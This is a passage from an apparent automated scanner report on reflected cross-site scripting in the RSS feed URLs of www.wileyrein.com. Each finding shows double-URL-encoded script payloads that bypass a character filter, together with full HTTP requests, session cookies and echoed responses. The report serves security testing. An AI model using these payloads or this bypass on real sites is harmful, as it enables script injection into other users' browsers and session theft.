<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices5de32"><script>alert(1)</script>bc55ccc6862/Advertising/rss.xml" value="">
...[SNIP]...

4.209. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5 was submitted in the REST URL parameter 3. This input was echoed as 80e2b"><script>alert(1)</script>09ca10697f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising80e2b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09ca10697f5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Advertising80e2b"><script>alert(1)</script>09ca10697f5/rss.xml" value="">
...[SNIP]...

4.210. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Advertising/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff was submitted in the REST URL parameter 4. This input was echoed as 86ab1"><script>alert(1)</script>6017d2c2dff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Advertising/rss.xml86ab1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6017d2c2dff HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Advertising/rss.xml86ab1"><script>alert(1)</script>6017d2c2dff" value="">
...[SNIP]...

4.211. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0 was submitted in the REST URL parameter 1. This input was echoed as 164d9"><script>alert(1)</script>7c58cabc2d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss164d9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c58cabc2d0/practices/Antitrust/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss164d9"><script>alert(1)</script>7c58cabc2d0/practices/Antitrust/rss.xml" value="">
...[SNIP]...

4.212. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b was submitted in the REST URL parameter 2. This input was echoed as 9acfd"><script>alert(1)</script>287c030088b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices9acfd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e287c030088b/Antitrust/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices9acfd"><script>alert(1)</script>287c030088b/Antitrust/rss.xml" value="">
...[SNIP]...

4.213. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af was submitted in the REST URL parameter 3. This input was echoed as bd079"><script>alert(1)</script>bf831efe7af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Antitrustbd079%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebf831efe7af/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Antitrustbd079"><script>alert(1)</script>bf831efe7af/rss.xml" value="">
...[SNIP]...

4.214. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Antitrust/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb was submitted in the REST URL parameter 4. This input was echoed as 10885"><script>alert(1)</script>9f493b0ddcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Antitrust/rss.xml10885%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9f493b0ddcb HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Antitrust/rss.xml10885"><script>alert(1)</script>9f493b0ddcb" value="">
...[SNIP]...

4.215. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601 was submitted in the REST URL parameter 1. This input was echoed as 4b382"><script>alert(1)</script>d866589a601 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss4b382%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed866589a601/practices/Appellate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss4b382"><script>alert(1)</script>d866589a601/practices/Appellate/rss.xml" value="">
...[SNIP]...

4.216. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40 was submitted in the REST URL parameter 2. This input was echoed as 83f09"><script>alert(1)</script>9da8d699e40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices83f09%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9da8d699e40/Appellate/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices83f09"><script>alert(1)</script>9da8d699e40/Appellate/rss.xml" value="">
...[SNIP]...

4.217. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a was submitted in the REST URL parameter 3. This input was echoed as 3566d"><script>alert(1)</script>021d1023e4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Appellate3566d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e021d1023e4a/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Appellate3566d"><script>alert(1)</script>021d1023e4a/rss.xml" value="">
...[SNIP]...

4.218. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Appellate/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c was submitted in the REST URL parameter 4. This input was echoed as 2c988"><script>alert(1)</script>407b643948c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Appellate/rss.xml2c988%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e407b643948c HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Appellate/rss.xml2c988"><script>alert(1)</script>407b643948c" value="">
...[SNIP]...

4.219. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0 was submitted in the REST URL parameter 1. This input was echoed as 2da3e"><script>alert(1)</script>93729e4d7b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss2da3e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e93729e4d7b0/practices/Aviation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss2da3e"><script>alert(1)</script>93729e4d7b0/practices/Aviation/rss.xml" value="">
...[SNIP]...

4.220. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5 was submitted in the REST URL parameter 2. This input was echoed as ed7d3"><script>alert(1)</script>dd1cc3a52a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practicesed7d3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edd1cc3a52a5/Aviation/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practicesed7d3"><script>alert(1)</script>dd1cc3a52a5/Aviation/rss.xml" value="">
...[SNIP]...

4.221. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296 was submitted in the REST URL parameter 3. This input was echoed as d5cb1"><script>alert(1)</script>7ae874bc296 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Aviationd5cb1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ae874bc296/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Aviationd5cb1"><script>alert(1)</script>7ae874bc296/rss.xml" value="">
...[SNIP]...

4.222. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Aviation/rss.xml

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 was submitted in the REST URL parameter 4. This input was echoed as 2f5ee"><script>alert(1)</script>49810451264 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/practices/Aviation/rss.xml2f5ee%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49810451264 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/practices/Aviation/rss.xml2f5ee"><script>alert(1)</script>49810451264" value="">
...[SNIP]...

4.223. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/practices/Bankruptcy__Financial_Restructuring/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e was submitted in the REST URL parameter 1. This input was echoed as e654b"><script>alert(1)</script>d4d67e0d85e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rsse654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
